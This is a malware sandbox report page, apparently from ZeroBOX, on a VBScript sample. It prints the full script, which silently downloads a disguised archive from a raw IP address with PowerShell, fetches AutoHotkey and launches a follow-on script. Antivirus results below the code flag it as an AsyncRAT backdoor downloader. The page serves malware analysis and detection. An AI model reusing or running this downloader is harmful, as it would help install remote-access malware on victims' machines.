Static | ZeroBOX
No static analysis available.
Dim Shell, Cmd
Set Shell = CreateObject("WScript.Shell")
Function DownloadAndExtract(url, zipPath, extractPath)
Dim DownloadCmd, ExtractCmd
DownloadCmd = "powershell.exe Start-BitsTransfer -Source '" & url & "' -Destination '" & zipPath & "'"
Shell.Run DownloadCmd, 0, True
ExtractCmd = "powershell.exe Expand-Archive -Path '" & zipPath & "' -DestinationPath '" & extractPath & "'"
Shell.Run ExtractCmd, 0, True
End Function
DownloadAndExtract "http://91.92.251.57:80/holo.png", "C:\Users\Public\holo.zip", "C:\Users\Public"
DownloadAndExtract "https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip", "C:\Users\Public\c.zip", "C:\Users\Public\"
WScript.Sleep 9000
filePath = "C:\Users\Public\Auto.vbs"
parameter = ""
shell.Run """" & filePath & """ """ & parameter & """"
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
Symantec Scr.Malcode!gen
ESET-NOD32 Clean
TrendMicro-HouseCall Backdoor.VBS.ASYNCRAT.YXEEJZ
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Backdoor.VBS.ASYNCRAT.YXEEJZ
FireEye Clean
Emsisoft Clean
GData Clean
Jiangmin Clean
Varist Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Microsoft Trojan:VBS/Sonbokli.A!cl
Google Clean
AhnLab-V3 Clean
Acronis Clean
ALYac Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.